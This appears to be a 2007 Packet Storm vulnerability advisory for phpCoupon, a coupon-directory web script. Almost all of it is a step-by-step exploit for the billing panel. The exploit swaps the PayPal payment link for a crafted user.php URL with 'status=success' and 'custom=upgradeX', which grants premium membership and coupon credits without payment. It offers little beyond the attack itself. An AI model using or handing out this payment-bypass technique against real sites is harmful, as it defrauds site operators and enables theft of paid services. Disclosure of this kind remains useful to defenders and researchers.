phpcoupon-upgrade.txt

2007-07-31T00:00:00
ID PACKETSTORM:58163
Type packetstorm
Reporter hack2prison
Modified 2007-07-31T00:00:00

Description

                                        
                                            `Discovered by freeprotect.net member  
Vendor site: http://phpcoupon.com  
====================================  
phpCoupon is Developed to provide an affordable and easy to operate local coupon websites for local and niche directory owners and entrepreneurs seeking income opportunites.  
It has a security hole. Please show how to exploit following:  
1. Click "Business Owners" and register account.  
2. Login and show:  
-------------------------------------------------  
Membership Expiration: 00-00-0000  
Maximum Coupons: 0 Coupons Used: 0 Coupons Available: 0  
-------------------------------------------------  
Meaning you aren't Premium Member.  
3. Click "Billing Control Panel"  
Click "Buy now" will redirect to paypal.com  
OK, now copy this link http://site.com/path/user.php/user.php?REQ=auth&billing=141&status=success&custom=upgradeX and paste override paypal link.  
Note: =upgradeX ---> X is number of coupon you need. Example: http://site.com/path/user.php/user.php?REQ=auth&billing=141&status=success&custom=upgrade5  
OK now relogin you account you see:  
-------------------------------------------------  
Membership Expiration: 07-28-2007  
Maximum Coupons: 0 Coupons Used: 0 Coupons Available: 0  
-------------------------------------------------  
You are Premium Member!!!!  
`